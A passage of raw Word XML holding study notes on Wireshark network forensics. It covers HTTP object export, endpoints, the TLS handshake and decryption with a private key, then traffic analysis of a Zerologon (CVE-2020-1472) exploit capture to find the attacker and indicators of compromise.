    <w:p w14:paraId="72BBEF04" w14:textId="7183FF1D" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDEDCA4" w14:textId="42C6576E" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="000F0DDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful in quickly identifying possible discrepancies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8CDB79" w14:textId="08C909B9" w:rsidR="000F0DDE" w:rsidRPr="0084205E" w:rsidRDefault="00A04508" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386AE03" w14:textId="494E5DF0" w:rsidR="00A04508" w:rsidRPr="0084205E" w:rsidRDefault="00A04508" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allow user to organize all endpoints and IPs found within a specific capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76A21E" w14:textId="10CF794E" w:rsidR="00A04508" w:rsidRPr="0084205E" w:rsidRDefault="00A04508" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful in identifying discrepancies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F6E39" w14:textId="47AB4060" w:rsidR="00A04508" w:rsidRPr="0084205E" w:rsidRDefault="00A04508" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Statistics &gt; Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD177D9" w14:textId="29CC64FD" w:rsidR="00A04508" w:rsidRPr="0084205E" w:rsidRDefault="00A04508" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTPS Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AFCDA" w14:textId="71A6F0ED" w:rsidR="00A04508" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Begin analyzing HTTPS traffic by looking at packets for the handshake between client and server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C75A3BE" w14:textId="6BA12742" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client Hello Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C019E" w14:textId="03FB8D36" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Contains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117D98B" w14:textId="5A563A2A" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSLv2 Record Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39023DFE" w14:textId="3EF3FBB0" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Handshake Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B6542" w14:textId="38322F18" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSL Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784575D2" w14:textId="78156D6D" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server Hello Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6913D420" w14:textId="6B740741" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Contains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D473A5A" w14:textId="1CE1E95D" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C24BEF" w14:textId="44913615" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSL Certificate information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D48B57" w14:textId="6EEF9F14" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="006E11A2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client Key Exchange Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6BCC5" w14:textId="4279CEDB" w:rsidR="006E11A2" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Part of the handshake will determine public key use to encrypt further messages between Client and Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56016E84" w14:textId="38A2EBD0" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server Confirm Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D6812" w14:textId="2A705797" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Confirm public key and create secure tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DCF7E0" w14:textId="78810CA2" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Traffic will be encrypted at this point and require private key for decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE9472" w14:textId="7F5A51E0" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To unencrypt data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47040B77" w14:textId="3BD5D34F" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>With private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15184DA7" w14:textId="304B8906" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Edit &gt; Preferences &gt; Protocols &gt; TLS</w:t>
      </w:r>
      <w:r w:rsidR="00980009" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt; RSA Keys List &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> [+]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55893A19" w14:textId="5E22B7F4" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Fil</w:t>
      </w:r>
      <w:r w:rsidR="00980009" w:rsidRPr="0084205E">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC601CC" w14:textId="084B40DB" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Port: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>start_tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="567329C2" w14:textId="194600C5" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Protocol: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFAC2E" w14:textId="74F804F2" w:rsidR="00354B9C" w:rsidRPr="0084205E" w:rsidRDefault="00354B9C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Keyfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: RSA Key Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2BB09" w14:textId="79F7140C" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00980009" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can now view unencrypted data streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C91AFB" w14:textId="03073D74" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00980009" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD4D27" w14:textId="42D5AEA6" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00980009" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Request URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A99FCBC" w14:textId="49C11527" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00980009" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F556225" w14:textId="6F722FDB" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00980009" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Good for threat hunting and network administration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA2C8BE" w14:textId="0F9A291F" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00980009" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Export HTTP object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282838F2" w14:textId="7C754B42" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Analyzing Exploit PCAPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF9B3F" w14:textId="3AD52700" w:rsidR="00980009" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Zerologon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> PCAP Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4606F0" w14:textId="1A9DA741" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows Active Directory Exploit – CVE-2020-1472</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D261CC4" w14:textId="1D879220" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Identifying the Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD9BE8" w14:textId="41621485" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Normal traffic from OpenVPN, ARP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ABA1033" w14:textId="1F6B9EA2" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Abnormal Traffic from unknown protocols such as DCERPC and EPM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB17933" w14:textId="212F0550" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check IP source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB8F1A" w14:textId="501192E0" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Zerologon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> POC Connection Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C68A0" w14:textId="4009FFE2" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set filter for the source of the IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA63C8" w14:textId="241EE2AB" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for IOCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA74CA" w14:textId="454BE2B9" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Indicators of Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B45B897" w14:textId="0500674F" w:rsidR="00577485" w:rsidRPr="0084205E" w:rsidRDefault="00577485" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
